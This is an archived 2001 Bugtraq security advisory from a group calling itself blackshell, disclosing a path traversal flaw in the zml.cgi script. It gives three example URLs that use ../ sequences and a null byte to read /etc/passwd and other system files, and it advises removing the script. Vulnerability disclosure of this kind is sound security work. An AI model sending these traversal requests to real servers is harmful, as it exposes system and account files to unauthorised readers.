From blackshell@hushmail.com Mon Dec 31 12:22:25 2001 From: blackshell@hushmail.com To: bugtraq@securityfocus.com Cc: vuln-dev@hotmail.com, vulnwatch@vulnwatch.org Date: Mon, 31 Dec 2001 00:04:20 -0800 Subject: blackshell2: zml.cgi remote exploit -----BEGIN PGP SIGNED MESSAGE----- ##################################################### #--blackshell security advisory no2--# # #--zml.cgi remote exploit--# # ##################################################### ######################## vendor details & history ######################## zml.cgi for webservers by jero.cc http://www.jero.cc/zml/zml.html ################## details of exploit ################## this is a classic CGI bug which uses ../../../../ to read remote files. example: http://www.blackshell.com/cgi-bin/zml.cgi?file=../../../../../../../../../etc/passwd%00 http://www.blackshell.com/cgi-bin/zml.cgi?file=../../../../../../../../../etc/fstab%00 http://www.blackshell.com/cgi-bin/zml.cgi?file=../../../../../../../../../etc/motd%00 this may be used by the attacker to gather vital details about the remote server. ### fix ### remote this script from your webserver #### note #### this test was conducted on apache box, and a redhat server. under no circumstances are we liable for any misuse of this information ######## hi's to: ######## blackshell dev team, #!blackshell contributors and anyone who over the years has helped us make us what we are ####### contact ####### blackshell@hushmail.com -----BEGIN PGP SIGNATURE----- Version: Hush 2.1 Note: This signature can be verified at https://www.hushtools.com wl8EARECAB8FAjwwHhcYHGJsYWNrc2hlbGxAaHVzaG1haWwuY29tAAoJED2VGGGCU8ut bHgAn28OCJjLmUCrk+sePY5ukAfYfopJAJ0Y54Te+w7HIVwXeUdSGt1PmPuTAA== =yPg1 -----END PGP SIGNATURE-----